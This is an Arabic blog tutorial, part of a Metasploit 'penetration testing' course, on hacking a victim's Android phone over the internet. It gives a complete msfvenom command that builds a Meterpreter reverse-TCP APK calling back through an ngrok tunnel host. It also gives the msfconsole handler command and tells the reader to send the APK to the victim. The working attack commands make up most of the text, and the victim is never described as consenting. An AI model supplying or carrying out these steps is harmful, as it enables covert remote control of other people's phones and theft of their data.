الجزء الثالث من دورة الميتاسبلويت - اختراق خارجي وفتح بورت من خلال اداة ngrok

السلام عليكم ورحمة الله وبركاته..
متابعي مدونة Droid 1x المتخصصة في مجال التقنية والتكنولوجيا والنهاردة انشاء الله انشرح الدرس السادس من كورس اختبار الاختراق

اختبار الاختراق كالي لينكس

Metasploit V6

اهلا وسهلا بكل متابعيني احنا في الدروس الي فاتت شرحنا مع بعض ازاي بنعمل بايلود وازاي بنقدر نتحكم في هاتف الضحية وازاي بنثبت جلسة الاختراق عشان نرجعلها في اي وقت النهارده انشاء الله انشرح مع بعض ازاي بنقدر نفتح بورت ونبدء نخترق اختراق خارج الشبكه مبدأيا بالنسبة للموضوع دة انا اعمل ليه تلات مواضيع لان في ناس كتير بتشتكي من الاتصال خارج الشبكه ومبتعرفش تفتح بورت او مبتعرفش تخترق خارج الشبكه انا في الدرس دة اشرح اداة اغلبكم يعرفها اسمها ngrok في الدرس التاني اشرح موقع بيجبلك بورت عن طريق ssh في الدرس التالت اشرح ازاي بنفتح بورت في الاكسس بيوند او الراوتر العادي يالا بينا نبدء في الشرح
اولا بنروح نعمل اكونت علي موقع الاداة وبنحملها
بندخل علي موقع Ngrok بعدين بندوس علي كلمه Sign up عشان نعمل ايميل طبعا بنكتب اول حاجه الاسم اكتب اي حاجه تاني حاجه بتكتب الايميل بتاعك ايميل جوجل مثلا تالت حاجه بتكتب اي باسورد تكون حافظه بعدين بتدوس (انا لست روبوت) وبتضغط sign up ايميل زي اي ايميل عادي جدا بيفتح معاك صفحه الاداة بتبدء تحملها بالضغط علي كلمها
Download Ngrok
بعد ما تحمل الاداة بتفك الضغط بتاعها لانها بتكون ملف مضغوط وتنقلها في الroot او الDesktop زي ما تحب بعدين بتفتح الترمنال وتكتب

 

cd Desktop
ls

اتظهرلك الاداة دة طبعاً كدة الاداة احنا نقلينها فى الDesktop تمام بعد ما تكتب ls وتتأكد ان الاداة موجودة بتكتب الامر
chmod +x ngrok
بعدين بنرجع للموقع تاني وننزل تحت شويه انلاقي خانات اول خانه فيها امر لفك ضغط الاداة خلاص مبقناش محتاجينو تاني خانه فيها امر تشغيل الاداة بتاخد الامر دة نسخ وبتروح تلصقه في الترمنال وبعدين تضغط انتر وتتاكد ان الامر اتحفظ بوجود كلمه save اخر الامر
دلوقتي بتكتب الامر ده عشان تشغل الاداة

./ngrok tcp 4444

مكان ال4444 بتحط البورت الي انت عايزو بعدين بمجرد ما تدوس انتر اتلاقي الاداة اشتغلت معاك بدون مشاكل بظهور كلمه online
دلوقتي انسيب الاداة شغاله ونروح نفتح ترمنال جديد وننشء بايلود خارج الشبكه
بعد ما فتحنا ترمنال جديد بنكتب فيه

msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=هنا الاي بي LPORT=هنا البورت  -o /root/Desktop/droid1x.apk

مكان كلمه (هنا الاي بي) بنكتب الهوست الي ظاهرلنا في اداة النجروك الي هو غالبا بيكون شكله بالطريقة دي 8.tcp.ngrok.io

ومكان كلمه (هنا البورت) بنكتب البورت الي ظاهرلنا في اداة النجروك مش البورت الي كتبنا واحنا بنفتح الاداة الي هو غالبا بيكون مكون من خمس ارقام زي كده 12413 يبقي كده الامر معانا بقي بالطريقة دي

 

msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=8.tcp.ngrok.io LPORT=12413  -o /root/Desktop/droid1x.apk

بعد ما كتبنا الامر بندوس انتر وبيبدء يكريت بايلود بأسم droid1x في الDesktop دلوقتي انرسل البايلود للضحيه ونبدء نكتب امر تشغيل البايلود الي هو

msfconsole -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST هنا الاي بي; set LPORT هنا البورت; run

مكان كلمه (هنا الاي بي) بتكتب 0.0.0.0
ومكان كلمه (هنا البورت) بتكتب 4444 يعني البورت الي كتبنا واحنا بنفتح الاداة كده الامر معانا بقي بالطريقة دي

msfconsole -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run

بعدين بتدوس انتر وتبدء تفتح البايلود في تلفون الضحية واتلاقي التبليغ وصل علي طول ولاكن في ملحوظة مهمه
بمجرد ما تقفل اداة النجروك وتشغلها تاني بتلاقي البورت الي دمجناه في البايلود اتغير وكمان الهوست بيتغير دة معناه ان بعد ما بنعمل البايلود منقدرش نشغله غير مرة واحدة بس طول ما الاداة شغاله لحل المشكله دي لازم تثبت اداة النجروك المدفوعه ودي طبعا بفلوس واحنا مش متعودين علي كده احنا عايزين المجاني وبس ههههه عشان كده انا لقيتلكم حل كويس ودة ايكون في الشرح الي جاي لاننا انشرح اداة غير النجروك بنقدر من خلالها نثبت الهوست و الاي بي عشان ميتغيروش مهما كانو لحد كده شرحنا خلص وبالنسبه لاداة النجروك انا عملتلكم فيديو توضيحي لكل الي شرحته تقدر تشوف الفيديو من هنا. 

watching video 

شاهد جزء بسيط من الشرح العملي